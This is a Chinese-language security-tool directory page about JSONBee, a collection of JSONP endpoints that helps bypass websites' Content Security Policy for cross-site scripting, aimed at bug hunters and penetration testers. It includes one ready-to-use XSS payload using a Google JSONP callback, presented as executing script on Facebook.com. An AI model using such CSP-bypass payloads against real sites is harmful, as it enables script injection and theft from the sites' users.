Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
JSONBee — 一个随时可用的JSONP端点/载荷,用于帮助绕过不同网站的内容安全策略(CSP)。 | Kitploit
工具/GitHubGitHub/zigoo0/jsonbee
信息收集WAF绕过Web安全渗透测试网络爬虫
GitHubzigoo0/jsonbee

JSONBee

一个随时可用的JSONP端点/载荷,用于帮助绕过不同网站的内容安全策略(CSP)。

查看仓库
765115282年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

JSONBee

一个随时可用的 JSONP 端点集合,帮助绕过不同网站的内容安全策略。

该工具在 2018 年基辅的 HackIT 大会上展示。演示文稿可在此处查看(不确定为什么幻灯片格式乱了 :D):https://www.slideshare.net/Hacken_Ecosystem/ebrahem-hegazy-bug-hunters-manual-for-bypassing-contentsecuritypolicy

什么是 JSONBee?

该工具的主要思想是自动找到能帮助绕过目标网站内容安全策略的 JSONP 端点。JSONBee 接收一个 URL 名称(例如 https://www.facebook.com),解析 CSP(内容安全策略),并自动建议能够绕过 CSP 的 XSS 载荷。它主要专注于我在漏洞赏金狩猎活动中收集的 JSONP 端点,可用于绕过 CSP。

JSONBee 依赖 3 种方法来收集 JSONP 端点:

  • 本项目的仓库;
  • Google dorks;
  • 互联网档案(archive.org)。

该工具尚未完全完成,我仍在添加一些验证和功能。但仓库将托管在此处,以便在工具准备就绪前任何人都能使用。

仓库包含可直接使用的载荷,能够绕过 Facebook.com、Google.com 等网站的 CSP。

绕过 Facebook.com 的内容安全策略:

Facebook.com 在其 CSP 策略(script-src 指令)中允许 *.google.com,因此以下载荷可以完美地在 Facebook.com 上执行 JavaScript: "><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>

如果你遇到一个网站,其 script-src 指令信任 jsonp.txt 文件中的任何域名,那么选取一个与该域名匹配的载荷,尽情享受吧 :)

如何帮助?

欢迎大家贡献,添加使用 JSONP 端点/回调的网站链接,使仓库更大、更有利于漏洞猎人、渗透测试人员和安全研究人员。

下载工具